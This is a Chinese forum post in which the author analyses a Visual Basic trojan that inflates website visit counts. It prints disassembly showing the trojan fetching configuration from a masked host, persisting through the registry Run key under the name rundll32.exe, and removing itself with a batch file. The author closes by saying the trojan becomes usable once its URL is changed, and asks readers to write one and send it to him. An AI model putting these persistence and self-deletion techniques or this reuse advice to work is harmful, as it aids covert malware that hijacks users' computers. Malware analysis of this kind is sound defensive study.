对一刷网站访问量的小马分析

Rain · 发表于 2009-11-23 01:00:17

ONT size=2>系统补丁打完，网上瞎灌，居然还中网马，哎.现在....把他网马down下来，8错，真牛.通杀98.nt.2000.xp.xpsp2.2003.自己留着，随便来分析了下他的[url=http://www.7747.net]木马。一刷流量木马。服了。现在小马都出到这个份上了。
脱壳略，VB编写。
00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj
00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX
00403DB9 . EB 0A    JMP SHORT Rundll32.00403DC5
00403DBB > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0
00403DC5 > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX
00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0
00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8
00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove
00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6
00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E24 . 8D4D A0    LEA ECX,DWORD PTR SS:[EBP-60]
00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7
00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]
00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8
00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B . 8D4D 8C    LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E84 . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9
00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A
00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B
00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"
00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup
00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11 . 51       PUSH ECX
00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18 . 52       PUSH EDX
00403F19 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"
00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

程序会到http://www.xxxxxxxx.com 的tc 文件读取配置文件，同时访问tc/MMResult.asp

生成文件
00404DA2 . /EB 0A    JMP SHORT Rundll32.00404DAE          //获取文件路径堆栈
00404DA4 > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0
00404DAE > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]       //我程序路径是 "D:\fuck you"
00404DB4 . 50       PUSH EAX                      //路径入eax
00404DB5 . 68 80274000 PUSH Rundll32.00402780          ; //生成killme.bat
00404DBA . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404DC0 . 8BD0    MOV EDX,EAX                //文件路径+文件名字D:\fuck you\killme.bat
00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404DCE . 50       PUSH EAX
00404DCF . 6A 01    PUSH 1
00404DD1 . 6A FF    PUSH -1
00404DD3 . 6A 02    PUSH 2
00404DD5 . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen
00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1 . 51       PUSH ECX
00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8 . 52       PUSH EDX
00404DE9 . 6A 02    PUSH 2
00404DEB . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404DF1 . 83C4 0C    ADD ESP,0C
00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404E00 . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23
00404E07 . 68 9C274000 PUSH Rundll32.0040279C          ; @echo off
00404E0C . 6A 01    PUSH 1
00404E0E . 68 B4274000 PUSH Rundll32.004027B4
00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E19 . 83C4 0C    ADD ESP,0C
00404E1C . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24
00404E23 . 68 BC274000 PUSH Rundll32.004027BC          ; sleep 100
00404E28 . 6A 01    PUSH 1
00404E2A . 68 B4274000 PUSH Rundll32.004027B4
00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E35 . 83C4 0C    ADD ESP,0C
00404E38 . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25
00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0
00404E46 . 75 1C    JNZ SHORT Rundll32.00404E64
00404E48 . 68 A8934000 PUSH Rundll32.004093A8
00404E4D . 68 94254000 PUSH Rundll32.00402594
00404E52 . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ; msvbvm60.__vbaNew2
00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E62 . EB 0A    JMP SHORT Rundll32.00404E6E
00404E64 > C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E6E > 8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C]
00404E74 . 8B08    MOV ECX,DWORD PTR DS:[EAX]
........
00404F1D . 52       PUSH EDX
00404F1E . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj
00404F24 . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX
00404F2A . EB 0A    JMP SHORT Rundll32.00404F36
00404F2C > C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0
00404F36 > 68 D4274000 PUSH Rundll32.004027D4          ; del
00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]       //程序的文件名字
00404F41 . 50       PUSH EAX                      //文件名入栈（rundll322）
00404F42 . 68 E4274000 PUSH Rundll32.004027E4          ; .exe （rundll322.exe）
00404F47 . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F4D . 8BD0    MOV EDX,EAX
00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404F55 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F5B . 50       PUSH EAX
00404F5C . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F62 . 8BD0    MOV EDX,EAX                      //（del rundll322.exe）
00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F6A . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F70 . 50       PUSH EAX
00404F71 . 6A 01    PUSH 1
00404F73 . 68 B4274000 PUSH Rundll32.004027B4
00404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404F7E . 83C4 0C    ADD ESP,0C
00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F87 . 51       PUSH ECX
00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4]
00404F8E . 52       PUSH EDX
00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0]
00404F95 . 50       PUSH EAX
00404F96 . 6A 03    PUSH 3
00404F98 . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404F9E . 83C4 10    ADD ESP,10
00404FA1 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]
00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404FAD . C745 FC 26000>MOV DWORD PTR SS:[EBP-4],26
00404FB4 . 68 F4274000 PUSH Rundll32.004027F4          ; del killme.bat
00404FB9 . 6A 01    PUSH 1
00404FBB . 68 B4274000 PUSH Rundll32.004027B4
00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FC6 . 83C4 0C    ADD ESP,0C
00404FC9 . C745 FC 27000>MOV DWORD PTR SS:[EBP-4],27
00404FD0 . 68 18284000 PUSH Rundll32.00402818          ; cls
00404FD5 . 6A 01    PUSH 1
00404FD7 . 68 B4274000 PUSH Rundll32.004027B4
00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FE2 . 83C4 0C    ADD ESP,0C
00404FE5 . C745 FC 28000>MOV DWORD PTR SS:[EBP-4],28
00404FEC . 68 24284000 PUSH Rundll32.00402824          ; exit
00404FF1 . 6A 01    PUSH 1
00404FF3 . 68 B4274000 PUSH Rundll32.004027B4
00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FFE . 83C4 0C    ADD ESP,0C
00405001 . C745 FC 29000>MOV DWORD PTR SS:[EBP-4],29
00405008 . 6A 01    PUSH 1
0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose
00405010 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A
00405017 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0
0040501E . 75 1C    JNZ SHORT Rundll32.0040503C
00405020 . 68 A8934000 PUSH Rundll32.004093A8
00405025 . 68 94254000 PUSH Rundll32.00402594

生成批处删记录
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit

简单的写注册表run。
004046ED . BA 5C284000 MOV EDX,Rundll32.0040285C          ; software\microsoft\windows\currentversion\run
004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8]
004046F8 . FF15 40114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy
004046FE . C745 FC 17000>MOV DWORD PTR SS:[EBP-4],17
00404705 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>; windir
0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00404719 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00404725 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup
0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]
00404731 . 52       PUSH EDX
00404732 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]
00404738 . 50       PUSH EAX
00404739 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar
0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>; \rundll32.exe

直接给出分析的总结吧。版权 BY。混世魔王 QQ：26836659
程序只是为了刷访问量。没有什么后门。也就隐藏了URL。用XXXX代理了。

程序运行后，你的电脑会访问 http://www.xxxxxxxx.com/tc/MMResult.asp
看代码
<HTML><HEAD><TITLE>.</TITLE>
<meta http-equiv="refresh" content="1; url=http://www.xxxx.net"> ‘地址用xxx代替了
</HEAD><BODY>
<script src='http://s47.cnzz.com/stat.php?id=223697&web_id=223697' language='JavaScript' charset='gb2312'></script> ’站长站的流量统计
</BODY></HTML>
把自身复制到c:/windows/
会生成批处删本地目录运行程序。
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit
程序的运行方式是写注册表
software\microsoft\windows\currentversion\run
键值rundll32.exe
程序写的不好，要插入进程，那效果会点。
只要把他程序的URL 修改一下这个木马就可以自己使用了.

有不足，还希指出。
  程序编写很简单，但是技术丢了好久了，不去恶补写不出，也没有时间去恶补。
有编程不错的，写了记得传我一个。呵呵。

		自动登录	找回密码
密码			注册